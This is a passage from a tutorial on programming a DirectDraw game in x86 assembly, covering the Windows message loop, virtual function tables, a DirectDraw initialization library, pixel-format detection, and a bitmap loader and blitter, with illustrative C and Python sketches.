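        ran++;                  /* stand-in for the message loop */

shutdown:
    game_shutdown();            /* runs on success and on failure */
    return ran;                 /* the single exit point */
}
```

With a failed init the function reports zero iterations, but the shutdown
routine has still been called exactly once.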
Now for the meat of WinMain(): the message loop. For those of you that have
never seen a Windows message loop before here is a quick explanation. Windows
maintains a queue of messages that the application receives -- whether from
other applications, user generated, or internal. In order to do ANYTHING an
application must process messages. These tell you that a key has been
pressed, the mouse button clicked, or the user wants to exit your program. If
this were a normal program, and not a high performance game, we would use
GetMessage() to retrieve a message from the queue and act upon it.
The problem however is, if there are no messages, the function WAITS until it
receives one. This is totally unacceptable for a game. We need to be
constantly performing our loop, no matter what messages we receive. So, one
way around this is to use PeekMessage() instead. PeekMessage() will return
zero if it has no messages, otherwise it will grab one off of the queue.
What this means is, if we have a message, it will get translated and
dispatched to our callback function. If we do not, we go straight on to the
main game loop. Now here is the trick: by arranging the code just right, the
main game loop will be called -- even if we process a message. If we did not
do this, then Windows could process 1,000's of messages while our game loop
wouldn't execute once!
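Here is a portable C model of that arrangement, for those who want to poke
at it away from Windows. The queue, the message codes and the function names
are all invented for this sketch; peek_message only imitates the
non-blocking behaviour of PeekMessage() with PM_REMOVE and is not the real
API.

```c
#include <stdbool.h>
#include <stddef.h>

enum { MSG_KEY = 1, MSG_QUIT = 2 };

/* A toy message queue, standing in for the one Windows keeps for us. */
typedef struct {
    const int *items;
    size_t     count;
    size_t     next;
} MsgQueue;

/* Non-blocking poll: returns false at once if the queue is empty. */
static bool peek_message(MsgQueue *q, int *msg)
{
    if (q->next >= q->count)
        return false;
    *msg = q->items[q->next++];
    return true;
}

/* Runs until MSG_QUIT arrives or max_frames is reached.
   Returns how many times the game logic ran. */
int game_loop(MsgQueue *q, int max_frames, int *dispatched)
{
    int frames = 0;
    *dispatched = 0;

    while (frames < max_frames) {
        int msg;
        if (peek_message(q, &msg)) {
            if (msg == MSG_QUIT)
                break;          /* leave the loop, go to shutdown */
            (*dispatched)++;    /* translate and dispatch */
        }
        frames++;               /* game logic: runs message or not */
    }
    return frames;
}
```

Because the game logic sits after the message handling rather than in an
else branch, it runs once per pass whether or not a message was handled.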
Finally, when a quit message is passed to the queue we will jump out of our
loop and execute the shutdown code. And that ... is the basic game loop.
Connecting to Direct Draw
-------------------------
Now we are going to get a little bit advanced. But, only for this section.
Unfortunately there is no cut and dried way to view DirectX in assembly. So,
I am going to explain it briefly, show you how to use it, and then forget
about it. This is not that imperative to know about, but it helps if you at
least understand the concepts.
The very first thing you need to understand is the concept of a Virtual
Function Table. This is where your call really goes, to be blunt about it.
The call offsets into this table, and from it selects the proper function
address to jump to. What this means to you is your call to a function is
actually a call through a simple look-up table that is already generated. In
this way, DirectX, or any other library built like DirectX, can change the
functions in a library w/o you ever having to know about it.
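If the idea of a Virtual Function Table is new to you, this C sketch may
help. The Shape type and its two methods are invented purely for
illustration and have nothing to do with DirectX itself; what matters is the
layout: the object begins with a pointer to a table of function addresses,
and every call goes through that table with the object passed along.

```c
/* Hypothetical interface: one table of function pointers per class,
   and every object starts with a pointer to its table. */
typedef struct Shape Shape;

typedef struct {
    int (*area)(const Shape *self);
    int (*perimeter)(const Shape *self);
} ShapeVtbl;

struct Shape {
    const ShapeVtbl *vtbl;      /* first field: pointer to the table */
    int w, h;
};

static int rect_area(const Shape *s)      { return s->w * s->h; }
static int rect_perimeter(const Shape *s) { return 2 * (s->w + s->h); }

static const ShapeVtbl rect_vtbl = { rect_area, rect_perimeter };

Shape make_rect(int w, int h)
{
    Shape s = { &rect_vtbl, w, h };
    return s;
}

/* The caller never names rect_area directly; it looks the address up
   in the table and calls through it, passing the object itself. */
int shape_area(const Shape *s)      { return s->vtbl->area(s); }
int shape_perimeter(const Shape *s) { return s->vtbl->perimeter(s); }
```

Swapping in a different table changes what shape_area() ends up calling
without touching any of the calling code.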
Once we have gotten that straight we can figure out how to make calls in
DirectX. Have you guessed how yet? The answer is we need to mimic the table
in some way so that our call is offset into the virtual table at the proper
address. We start by simply having a base address that gets called, which is
a given in DirectX libraries. Then we make a list of all functions for that
object, appending the size of their parameters. This is our offset into the
table. Now, we are all set to call the functions.
Calling these functions can be a bit of work. First you have to specify the
address of the object that you want to make the call on. Then, you have to
resolve the virtual address, and then, finally, push all of the parameters
onto the stack, including the object, for the call. Ugly isn't it? For that
reason there is a set of macros provided that will allow you to make calls
for these objects fairly easily. I will only cover one since the rest are
based on the same premise. The most basic one is DD4INVOKE. This macro is for
a Direct Draw 4 object. It is important that we have different invokes for
different versions of the same object. If we did not, then wrong routines
would be called since the Virtual Table changes as they add/remove functions
from the lib's.
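A rough C analogue of such per-version invoke macros is shown below. None of
these names come from DirectX or from the include files used in this series:
Draw, DrawV1Vtbl, DrawV2Vtbl, V1INVOKE and V2INVOKE are made up for the
sketch. It assumes that version 2 of the interface inserted a method in the
middle of the table, so that set_mode lives in a different slot than it did
in version 1.

```c
typedef struct Draw Draw;

/* Two hypothetical versions of one interface. Version 2 added a
   method in the middle, so 'set_mode' moved from slot 1 to slot 2. */
typedef struct {
    int (*create)(Draw *self, int w);
    int (*set_mode)(Draw *self, int bpp);
} DrawV1Vtbl;

typedef struct {
    int (*create)(Draw *self, int w);
    int (*restore)(Draw *self, int flags);
    int (*set_mode)(Draw *self, int bpp);
} DrawV2Vtbl;

struct Draw {
    const void *vtbl;           /* points at a V1 or a V2 table */
    int last;
};

static int d_create(Draw *d, int w)   { d->last = w;  return 1; }
static int d_restore(Draw *d, int f)  { d->last = -f; return 2; }
static int d_set_mode(Draw *d, int b) { d->last = b;  return 3; }

static const DrawV2Vtbl draw_v2 = { d_create, d_restore, d_set_mode };

/* One macro per interface version: function name first, then the
   object, then the parameters. Each macro reads the slot from the
   table layout of its own version and passes the object along. */
#define V1INVOKE(method, obj, ...) \
    (((const DrawV1Vtbl *)(obj)->vtbl)->method((obj), __VA_ARGS__))
#define V2INVOKE(method, obj, ...) \
    (((const DrawV2Vtbl *)(obj)->vtbl)->method((obj), __VA_ARGS__))
```

Given a version 2 object, V2INVOKE(set_mode, &d, 16) reaches d_set_mode.
Using V1INVOKE on the same object would read slot 1 and land in the restore
routine instead, which is exactly the kind of mix-up the separate macros are
there to prevent.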
The idea behind the macro is fairly simple. First, you specify the function
name, then the object name, and then the parameters. Here is an example:
;========================================
; Now create the primary surface
;========================================
DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL
The above line of code calls the CreateSurface() function on a Direct Draw 4
object. It passes the pointer to the object, the address of a Direct Draw
Surface Description structure, the address of the variable to hold the
pointer to the surface, and finally NULL. This call is an example of how we
will interface to DirectX in this article series. Now that we have seen how
to make calls to DirectX, we need to build a small library for us to use,
which we cover in the next section.
Our Direct Draw Library
-----------------------
Alright, we are now ready to start coding our Direct Draw library routines.
So, the logical starting place would be figuring out what kinds of routines
we will need for the game. Obviously we want an initialization and shutdown
routine, and we are going to need a function to lock and unlock surfaces.
Also, it would be nice to have a function to draw text, and, since the game
is going to run in 16 bpp mode, we will want a function that can figure out
the pixel format for us. It would also be a good idea to have a function that
creates surfaces, a function that loads a bitmap into a surface, and a
function to flip our buffers for us. That should cover it ... so let's get
started.
The first routine that we will look at is the initialization routine. This is
the most logical place to start, especially since the routine has just about
every type of call we will be using in Direct Draw. Here is the code:
;########################################################################
; DD_Init Procedure
;########################################################################
DD_Init PROC screen_width:DWORD, screen_height:DWORD, screen_bpp:DWORD
;=======================================================
; This function will setup DD to full screen exclusive
; mode at the passed in width, height, and bpp
;=======================================================
;=================================
; Local Variables
;=================================
LOCAL lpdd_1 :LPDIRECTDRAW
;=============================
; Create a default object
;=============================
INVOKE DirectDrawCreate, 0, ADDR lpdd_1, 0
;=============================
; Test for an error
;=============================
.IF EAX != DD_OK
;======================
; Give err msg
;======================
INVOKE MessageBox, hMainWnd, ADDR szNoDD, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;=========================================
; Lets try and get a DirectDraw 4 object
;=========================================
DDINVOKE QueryInterface, lpdd_1, ADDR IID_IDirectDraw4, ADDR lpdd
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoDD4, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;===================================================
; Set the cooperative level
;===================================================
DD4INVOKE SetCooperativeLevel, lpdd, hMainWnd, \
DDSCL_ALLOWMODEX OR DDSCL_FULLSCREEN OR \
DDSCL_EXCLUSIVE OR DDSCL_ALLOWREBOOT
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoCoop, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;===================================================
; Set the Display Mode
;===================================================
DD4INVOKE SetDisplayMode, lpdd, screen_width, \
screen_height, screen_bpp, 0, 0
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoDisplay, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;================================
; Save the screen info
;================================
m2m app_width, screen_width
m2m app_height, screen_height
m2m app_bpp, screen_bpp
;========================================
; Setup to create the primary surface
;========================================
DDINITSTRUCT OFFSET ddsd, SIZEOF(DDSURFACEDESC2)
MOV ddsd.dwSize, SIZEOF(DDSURFACEDESC2)
MOV ddsd.dwFlags, DDSD_CAPS OR DDSD_BACKBUFFERCOUNT
MOV ddsd.ddsCaps.dwCaps, DDSCAPS_PRIMARYSURFACE OR \
DDSCAPS_FLIP OR DDSCAPS_COMPLEX
MOV ddsd.dwBackBufferCount, 1
;========================================
; Now create the primary surface
;========================================
DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoPrimary, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;==========================================
; Try to get a backbuffer
;==========================================
MOV ddscaps.dwCaps, DDSCAPS_BACKBUFFER
DDS4INVOKE GetAttachedSurface, lpddsprimary, ADDR ddscaps, \
ADDR lpddsback
;=========================================
; Did we get it??
;=========================================
.IF EAX != DD_OK
;==============================
; No so give err message
;==============================
INVOKE MessageBox, hMainWnd, ADDR szNoBackBuffer, NULL, MB_OK
;======================
; Jump and return out
;======================
JMP err
.ENDIF
;==========================================
; Get the RGB format of the surface
;==========================================
INVOKE DD_Get_RGB_Format, lpddsprimary
done:
;===================
; We completed
;===================
return TRUE
err:
;===================
; We didn't make it
;===================
return FALSE
DD_Init ENDP
;########################################################################
; END DD_Init
;########################################################################
The above code is fairly complex so let's see what each individual section
does.
The first step is we create a default Direct Draw object. This is nothing
more than a simple call with a couple of parameters. NOTE: since it is NOT
based on an already created object, the function is not virtual. Therefore,
we can call it like a normal function using INVOKE. Also, notice how we check
for an error right afterwards. This is very important in DirectX. In the case
of an error, we merely give a message, and then jump to the error return at
the bottom of the procedure.
The second step is we query for a DirectDraw4 object. We will almost always
want the newest version of the objects, and querying after you have the base
object is the way to get them. If this succeeds we then set the cooperative
level and the display mode for our game. Nothing major ... but don't forget
to check for errors.
Our next step is to create a primary surface for the object that we have. If
that succeeds we get the back buffer that is attached to it. The structure
that we pass to CreateSurface, and to other DirectX calls, needs to be
cleared before using it. This is done in a macro, DDINITSTRUCT, that I have
included in the DDraw.inc file.
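The clear-then-fill habit looks like this in C. SurfaceDesc and init_desc
are hypothetical names used only for this sketch (the real structure is far
larger), and the sketch sets the size field inside the helper, whereas the
listing above sets dwSize in a separate MOV after the macro.

```c
#include <string.h>

/* Hypothetical descriptor, shaped like the DirectX ones: the first
   field holds the structure's own size in bytes. */
typedef struct {
    unsigned long size;
    unsigned long flags;
    unsigned long back_buffer_count;
} SurfaceDesc;

/* Clear every field, then record the size, so the callee never sees
   stale values left over from an earlier call. */
void init_desc(SurfaceDesc *d)
{
    memset(d, 0, sizeof *d);
    d->size = (unsigned long)sizeof *d;
}
```

After the call only the size field is non-zero, and the caller fills in just
the fields it cares about.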
The final thing we do is make a call to our routine that determines the pixel
format for our surfaces. All of these pieces fit together into initializing
our system for use.
The next routine we will look at is the pixel format obtainer. This is a
fairly advanced routine so I wanted to make sure that we cover it. Here is
the code:
;########################################################################
; DD_Get_RGB_Format Procedure
;########################################################################
DD_Get_RGB_Format PROC surface:DWORD
;=========================================================
; This function will setup some globals to give us info
; on the pixel format of the current display mode
;=========================================================
;====================================
; Local variables
;====================================
LOCAL shiftcount :BYTE
;================================
; get a surface description
;================================
DDINITSTRUCT ADDR ddsd, sizeof(DDSURFACEDESC2)
MOV ddsd.dwSize, sizeof(DDSURFACEDESC2)
MOV ddsd.dwFlags, DDSD_PIXELFORMAT
DDS4INVOKE GetSurfaceDesc, surface, ADDR ddsd
;==============================
; fill in masking values
;==============================
m2m mRed, ddsd.ddpfPixelFormat.dwRBitMask ; Red Mask
m2m mGreen, ddsd.ddpfPixelFormat.dwGBitMask ; Green Mask
m2m mBlue, ddsd.ddpfPixelFormat.dwBBitMask ; Blue Mask
;====================================
; Determine the pos for the red mask
;====================================
MOV shiftcount, 0
.WHILE (!(ddsd.ddpfPixelFormat.dwRBitMask & 1))
SHR ddsd.ddpfPixelFormat.dwRBitMask, 1
INC shiftcount
.ENDW
MOV AL, shiftcount
MOV pRed, AL
;=======================================
; Determine the pos for the green mask
;=======================================
MOV shiftcount, 0
.WHILE (!(ddsd.ddpfPixelFormat.dwGBitMask & 1))
SHR ddsd.ddpfPixelFormat.dwGBitMask, 1
INC shiftcount
.ENDW
MOV AL, shiftcount
MOV pGreen, AL
;=======================================
; Determine the pos for the blue mask
;=======================================
MOV shiftcount, 0
.WHILE (!(ddsd.ddpfPixelFormat.dwBBitMask & 1))
SHR ddsd.ddpfPixelFormat.dwBBitMask, 1
INC shiftcount
.ENDW
MOV AL, shiftcount
MOV pBlue, AL
;===========================================
; Set a special var if we are in 16 bit mode
;===========================================
.IF app_bpp == 16
.IF pRed == 10
MOV Is_555, TRUE
.ELSE
MOV Is_555, FALSE
.ENDIF
.ENDIF
done:
;===================
; We completed
;===================
return TRUE
DD_Get_RGB_Format ENDP
;########################################################################
; END DD_Get_RGB_Format
;########################################################################
First, we initialize our description structure and make a call to get the
surface description from Direct Draw. We place the masks that are returned in
global variables, since we will want to use them in all kinds of places. A
mask is a value that you can use to set or clear certain bits in a
variable/register. In our case, we use them to mask off the unnecessary bits
so that we can access the red, green, or blue bits of our pixel individually.
The next three sections of code determine the bit position of each color
component, that is, how far the component has to be shifted left to land
in its proper place in the pixel. For example, a typical 5-6-5 mode keeps
blue in bits 0-4, green in bits 5-10, and red in bits 11-15, so the
positions are 0, 5, and 11. We find a position by AND'ing the mask with the
number one and, as long as the result is zero, shifting the mask right by 1
and incrementing a counter. This works because the mask contains a 1 in
every bit that belongs to the component. AND'ing with one turns off every
bit except the lowest, so the loop stops as soon as the first valid bit of
the mask reaches bit 0, and the counter then holds the number of bits we
need to shift by.
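The shift-and-test loop can be sketched outside of assembler as follows.
This is a minimal Python illustration, not part of the game source: the
name mask_position and the sample mask values are assumptions made for the
example (the real masks come from Direct Draw at run time).

```python
def mask_position(mask: int) -> int:
    """Count the right shifts needed before bit 0 of the mask is set."""
    if mask == 0:
        # Guard added for the sketch: an empty mask would loop forever.
        raise ValueError("an empty mask has no position")
    shift = 0
    while (mask & 1) == 0:   # same test as the .WHILE condition
        mask >>= 1           # SHR mask, 1
        shift += 1           # INC shiftcount
    return shift


# Assumed, typical 16 bpp masks; real values are reported by the driver.
RED_565, GREEN_565, BLUE_565 = 0xF800, 0x07E0, 0x001F
RED_555 = 0x7C00

print(mask_position(RED_565), mask_position(GREEN_565), mask_position(BLUE_565))
# prints: 11 5 0
print(mask_position(RED_555))
# prints: 10
```

A red position of 10 is exactly what the listing tests for when it sets
Is_555.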
Finally, we set a variable that tells us whether the video mode is 5-5-5 or
5-6-5. The test is the red position: 10 means 5-5-5, and anything else is
treated as 5-6-5. This is extremely important since 16 bpp mode can be
either, and we do not want our pictures to have a green or purple tint on
one machine and look fine on another one!
The last function that I want to cover in our Direct Draw library is the
text drawing function. This uses GDI and so I figured I should at least give
it a small explanation. The code ...
;########################################################################
; DD_Draw_Text Procedure
;########################################################################
DD_Draw_Text PROC surface:DWORD, text:DWORD, num_chars:DWORD,
x:DWORD, y:DWORD, color:DWORD
;=======================================================
; This function will draw the passed text on the passed
; surface using the passed color at the passed coords
; with GDI
;=======================================================
;===========================================
; First we need to get a DC for the surface
;===========================================
DDS4INVOKE GetDC, surface, ADDR hDC
;===========================================
; Set the text color and BK mode
;===========================================
INVOKE SetTextColor, hDC, color
INVOKE SetBkMode, hDC, TRANSPARENT
;===========================================
; Write out the text at the desired location
;===========================================
INVOKE TextOut, hDC, x, y, text, num_chars
;===========================================
; release the DC we obtained
;===========================================
DDS4INVOKE ReleaseDC, surface, hDC
done:
;===================
; We completed
;===================
return TRUE
DD_Draw_Text ENDP
;########################################################################
; END DD_Draw_Text
;########################################################################
Following this code is relatively simple. First, we get the Device Context
(DC) for our surface. In Windows, drawing is typically done through these
DCs, so if you want to use any GDI function in Direct Draw, the first thing
you have to do is get the DC for your surface. Then, we set the text color
and background mode using basic Windows GDI calls. Now we are ready to draw
our text, and again we just make a call to a Windows function, TextOut().
There are many other text functions; this is just the one that I chose to
use. Finally, we release the DC for our surface.
The rest of the Direct Draw routines follow the same basic format and use
the same types of calls, so they shouldn't be too hard to figure out. The
basic idea behind all of the routines is the same: encapsulate the
functionality we need into some services that still allow us to be flexible.
Now, we need to write the code to handle our bitmaps that go into these
surfaces.
Our Bitmap Library
------------------
We are now ready to write our bitmap library. We will start like the Direct
Draw library by determining what we need. As far as I can tell right now, we
should be good with two simple routines: a bitmap loader and a draw routine.
Since we will be using surfaces, the draw routine should draw onto the
passed surface. Our loader will load our special file format, which I will
cover in a moment. That should be it; there isn't that much that is needed
for bitmaps nowadays. DirectX is how most manipulation occurs, especially
since many things can be done in hardware. With that in mind we will cover
our unique file format.
Normally, creating your own file format is a headache and isn't worth the
trouble. However, in our case it greatly simplifies the code, and I have
provided the conversion utility with the download package. This format is
probably one of the easiest you will ever encounter. It has five main parts:
Width, Height, BPP, Size of Buffer, and Buffer. The first three give
information on the image. I have our library set up for 16 bpp only, but
implementing other bit depths would be fairly easy. The fourth section tells
us how large a buffer we need for the image, and the fifth section is that
buffer. Having our own format not only makes the code we need to write a lot
easier, it also prevents other people from seeing our work before they were
meant to see it! Now, how do we load this bad boy?
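To make the five parts concrete, here is a small Python sketch of reading
such a header. The field widths are an assumption inferred from the offsets
the loader below uses (width at 0, height at 4, buffer size at 10, pixel
data at 14, which leaves 2 bytes for BPP); the article does not spell them
out, and the names parse_sfp and build_sfp are hypothetical.

```python
import struct

# Assumed layout: width (4 bytes), height (4), bpp (2), buffer size (4),
# followed by the pixel buffer. Little-endian, no padding: 14 bytes total.
SFP_HEADER = struct.Struct("<IIHI")


def parse_sfp(data: bytes):
    """Split an SFP image into (width, height, bpp, pixel_buffer)."""
    width, height, bpp, size = SFP_HEADER.unpack_from(data, 0)
    start = SFP_HEADER.size
    pixels = data[start:start + size]
    if len(pixels) != size:
        raise ValueError("file is shorter than its header claims")
    return width, height, bpp, pixels


def build_sfp(width: int, height: int, bpp: int, pixels: bytes) -> bytes:
    """Build an image in the assumed layout (used here only for the demo)."""
    return SFP_HEADER.pack(width, height, bpp, len(pixels)) + pixels


sample = build_sfp(2, 1, 24, bytes([1, 2, 3, 4, 5, 6]))
print(parse_sfp(sample))
```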
;########################################################################
; Create_From_SFP Procedure
;########################################################################
Create_From_SFP PROC ptr_BMP:DWORD, sfp_file:DWORD, desired_bpp:DWORD
;=========================================================
; This function will allocate our bitmap structure and
; will load the bitmap from an SFP file. Converting if
; it is needed based on the passed value.
;=========================================================
;=================================
; Local Variables
;=================================
LOCAL hFile :DWORD
LOCAL hSFP :DWORD
LOCAL Img_Left :DWORD
LOCAL Img_Alias :DWORD
LOCAL red :DWORD
LOCAL green :DWORD
LOCAL blue :DWORD
LOCAL Dest_Alias :DWORD
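;=================================
; No SFP buffer yet, so the err
; path has nothing real to free
;=================================
MOV hSFP, NULL
;=================================
; Open the SFP file
;=================================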
INVOKE CreateFile, sfp_file, GENERIC_READ,FILE_SHARE_READ, \
NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL
MOV hFile, EAX
;===============================
; Test for an error
;===============================
.IF EAX == INVALID_HANDLE_VALUE
JMP err
.ENDIF
;===============================
; Get the file size
;===============================
INVOKE GetFileSize, hFile, NULL
PUSH EAX
;================================
; test for an error
;================================
.IF EAX == -1
JMP err
.ENDIF
;==============================================
; Allocate enough memory to hold the file
;==============================================
INVOKE GlobalAlloc, GMEM_FIXED, EAX
MOV hSFP, EAX
;===================================
; test for an error
;===================================
.IF EAX == 0
JMP err
.ENDIF
;===================================
; Put the file into memory
;===================================
POP EAX
INVOKE ReadFile, hFile, hSFP, EAX, OFFSET Amount_Read, NULL
;====================================
; Test for an error
;====================================
.IF EAX == FALSE
;========================
; We failed so leave
;========================
JMP err
.ENDIF
;===================================
; Determine the size without the BPP
;===================================
MOV EBX, hSFP
MOV EAX, DWORD PTR [EBX]
ADD EBX, 4
MOV ECX, DWORD PTR [EBX]
MUL ECX
PUSH EAX
;======================================
; Do we allocate a 16 or 24 bit buffer
;======================================
.IF desired_bpp == 16
;============================
; Just allocate a 16-bit
;============================
POP EAX
SHL EAX, 1
INVOKE GlobalAlloc, GMEM_FIXED, EAX
MOV EBX, ptr_BMP
MOV DWORD PTR [EBX], EAX
MOV Dest_Alias, EAX
;====================================
; Test for an error
;====================================
.IF EAX == FALSE
;========================
; We failed so leave
;========================
JMP err
.ENDIF
.ELSE
;========================================
; This is where code for 24 bit would go
;========================================
;============================
; For now just return an err
;============================
JMP err
.ENDIF
;====================================
; Setup for reading in
;====================================
MOV EBX, hSFP
ADD EBX, 10
MOV EAX, DWORD PTR[EBX]
MOV Img_Left, EAX
ADD EBX, 4
MOV Img_Alias, EBX
;====================================
; Now lets start converting values
;====================================
.WHILE Img_Left > 0
;==================================
; Build a color word based on
; the desired BPP or transfer
;==================================
.IF desired_bpp == 16
;==========================================
; Read in a byte for blue, green and red
;==========================================
XOR ECX, ECX
MOV EBX, Img_Alias
MOV CL, BYTE PTR [EBX]
MOV blue, ECX
INC EBX
MOV CL, BYTE PTR [EBX]
MOV green, ECX
INC EBX
MOV CL, BYTE PTR [EBX]
MOV red, ECX
;=======================
; Adjust the Img_Alias
;=======================
ADD Img_Alias, 3
;================================
; Do we build a 555 or a 565 val
;================================
.IF Is_555 == TRUE
;============================
; Build the 555 color word
;============================
RGB16BIT_555 red, green, blue
.ELSE
;============================
; Build the 565 color word
;============================
RGB16BIT_565 red, green, blue
.ENDIF
;================================
; Transfer it to the final buffer
;================================
MOV EBX, Dest_Alias
MOV WORD PTR [EBX], AX
;============================
; Adjust the dest by 2
;============================
ADD Dest_Alias, 2
.ELSE
;========================================
; This is where code for 24 bit would go
;========================================
;============================
; For now just return an err
;============================
JMP err
.ENDIF
;=====================
; Sub amount left by 3
;=====================
SUB Img_Left, 3
.ENDW
;====================================
; Free the SFP Memory
;====================================
INVOKE GlobalFree, hSFP
done:
;===================
; We completed
;===================
return TRUE
err:
;====================================
; Free the SFP Memory
;====================================
INVOKE GlobalFree, hSFP
;===================
; We didn't make it
;===================
return FALSE
Create_From_SFP ENDP
;########################################################################
; END Create_From_SFP
;########################################################################
The code starts out by calling CreateFile, which, despite the name, is how
you open an existing file in Windows, and then retrieves the file size. This
allows us to allocate enough memory to load our entire file in. Reading in
the file is fairly simple: we just make a call to ReadFile. As usual, the
most important parts are those that check for errors.
Once the file is in memory we compute the size of the desired image based
upon the width and height in our header, and the "desired_bpp" level that
was passed in to the function. Then we allocate yet another buffer with the
information we calculated. This is the buffer that is kept in the end.
The next step is the heart of our load function. Here we read in 3 bytes
(blue, green, then red), since our pictures are stored as 24-bit images,
and create the proper color value ( 5-6-5 or 5-5-5 ) for the buffer. We
then store that value in the new buffer that we just created. We loop
through all pixels in our bitmap and convert each to the desired format.
The conversion is based on a pre-defined macro. You could also implement
the function by using the members we filled in when we called the function
to get the pixel format. This second way would allow you to have a more
abstract interface to the code ... but for our purposes it was better to see
what was really happening to the bits.
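For readers who want to see the bit arithmetic spelled out, the conversion
loop can be sketched in Python as below. The bodies of the RGB16BIT_555 and
RGB16BIT_565 macros are not shown in this article, so this sketch assumes
they keep the top 5 (or 6) bits of each 8-bit component; the function names
are hypothetical.

```python
def pack_565(red: int, green: int, blue: int) -> int:
    """Pack 8-bit components into 5-6-5 by keeping the top bits (assumed)."""
    return ((red >> 3) << 11) | ((green >> 2) << 5) | (blue >> 3)


def pack_555(red: int, green: int, blue: int) -> int:
    """Pack 8-bit components into 5-5-5 by keeping the top bits (assumed)."""
    return ((red >> 3) << 10) | ((green >> 3) << 5) | (blue >> 3)


def convert_bgr24(pixels: bytes, is_555: bool) -> bytes:
    """Convert blue/green/red byte triples into 16-bit little-endian words."""
    pack = pack_555 if is_555 else pack_565
    out = bytearray()
    for i in range(0, len(pixels) - 2, 3):   # one 3-byte pixel per step
        blue, green, red = pixels[i], pixels[i + 1], pixels[i + 2]
        out += pack(red, green, blue).to_bytes(2, "little")
    return bytes(out)


print(hex(pack_565(255, 0, 0)), hex(pack_555(255, 0, 0)))
# prints: 0xf800 0x7c00
```

Pure red lands at bit 11 in one format and bit 10 in the other, which is why
picking the wrong macro tints the whole picture.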
At the completion of our loop we free the main buffer. The address of the
buffer with our converted pixel values has already been stored through
ptr_BMP, so the caller has it when we return. If an error occurs at any
point, we jump to our error code, which frees the file buffer we may have
created. This is to prevent memory leaks. And ... that is it for the load
function.
Once the bitmap is loaded into memory we need to be able to draw it onto a
Direct Draw surface. Whether we are loading it in there permanently, or just
drawing a quick picture onto the back buffer should not matter. So, we will
look at a function that draws the passed bitmap onto our passed surface.
Here is the code:
;########################################################################
; Draw_Bitmap Procedure
;########################################################################
Draw_Bitmap PROC surface:DWORD, bmp_buffer:DWORD, lPitch:DWORD, bpp:DWORD
;=========================================================
; This function will draw the BMP on the surface.
; the surface must be locked before the call.
;
; It uses the width and height of the screen to do so.
; I hardcoded this in just 'cause ... okay.
;
; This routine does not do transparency!
;=========================================================
;===========================
; Local Variables
;===========================
LOCAL dest_addr :DWORD
LOCAL source_addr :DWORD
;===========================
; Init the addresses
;===========================
MOV EAX, surface
MOV EBX, bmp_buffer
MOV dest_addr, EAX
MOV source_addr, EBX
;===========================
; Init counter with height
;
; Hard-coded in.
;===========================
MOV EDX, 480
;=================================
; We are in 16 bit mode
;=================================
copy_loop1:
;=============================
; Setup num of DWORDs in width
;
; Hard-coded also.
;
; 640*2/4 = 320.
;=============================
MOV ECX, 320
;=============================
; Set source and dest
;=============================
MOV EDI, dest_addr
MOV ESI, source_addr
;======================================
; Move by DWORDS
;======================================
REP movsd
;==============================
; Adjust the variables
;==============================
MOV EAX, lPitch
MOV EBX, 1280
ADD dest_addr, EAX
ADD source_addr, EBX
;========================
; Dec the line counter
;========================
DEC EDX
;========================
; Did we hit bottom?
;========================
JNE copy_loop1
done:
;===================
; We completed
;===================
return TRUE
err:
;===================
; We didn't make it
;===================
return FALSE
Draw_Bitmap ENDP
;########################################################################
; END Draw_Bitmap
;########################################################################
This function is a little bit more advanced than some of the others we have
seen, so pay attention. We know, as assembly programmers, that if we can get
everything into a register things will be faster than if we had to access
memory. So, in that spirit, the copy of each line runs entirely out of
registers: ESI holds the source address, EDI the destination address, and
ECX the count.
Then, we compute the number of WORDS in our line. We can then divide this
number by 2, so that we have the number of DWORDS in a line. I have
hard-coded this number in since we will always be in 640 x 480 x 16 for our
game. Once we have this number we place it in the register ECX. The reason
for this is that our next instruction, MOVSD, can be combined with the REP
prefix. This will move a DWORD from [ESI] to [EDI], advance both pointers,
decrement ECX by 1, and repeat until ECX is equal to zero. In short it is
like having a For loop with the counter in ECX. As we have the code right
now, it is moving a DWORD from the source into the destination until we have
exhausted the number of DWORDS in our line. We then advance the source by
1280 bytes and the destination by lPitch, since a line of the surface may
take up more memory than the pixels we see, and do this over again until we
have reached the number of lines in our height ( 480 in our case ).
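The row-by-row copy, including the different step sizes for source and
destination, can be sketched in Python like this. It is only an
illustration of the loop structure: the function name and the default
parameters are assumptions, and a slice assignment stands in for REP MOVSD.

```python
def draw_bitmap(surface: bytearray, bitmap: bytes, pitch: int,
                width: int = 640, height: int = 480,
                bytes_per_pixel: int = 2) -> None:
    """Copy a tightly packed bitmap onto a surface whose lines are
    `pitch` bytes apart."""
    row_bytes = width * bytes_per_pixel          # 1280 for 640 x 16 bpp
    if pitch < row_bytes:
        raise ValueError("pitch is smaller than one line of pixels")
    if len(bitmap) < row_bytes * height:
        raise ValueError("bitmap is too small")
    if len(surface) < pitch * (height - 1) + row_bytes:
        raise ValueError("surface is too small")
    dest = 0
    src = 0
    for _ in range(height):                      # EDX counts the lines
        # One line: what REP MOVSD does with ECX = row_bytes / 4.
        surface[dest:dest + row_bytes] = bitmap[src:src + row_bytes]
        dest += pitch                            # ADD dest_addr, lPitch
        src += row_bytes                         # ADD source_addr, 1280


# Tiny demo: a 2 x 2 image copied onto a surface with 2 padding bytes
# at the end of every line.
surface = bytearray(12)
draw_bitmap(surface, bytes(range(1, 9)), pitch=6, width=2, height=2)
print(list(surface))
# prints: [1, 2, 3, 4, 0, 0, 5, 6, 7, 8, 0, 0]
```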
Those are our only two functions in the bitmap module. They are short and
sweet. More importantly, now that we have our bitmap and Direct Draw
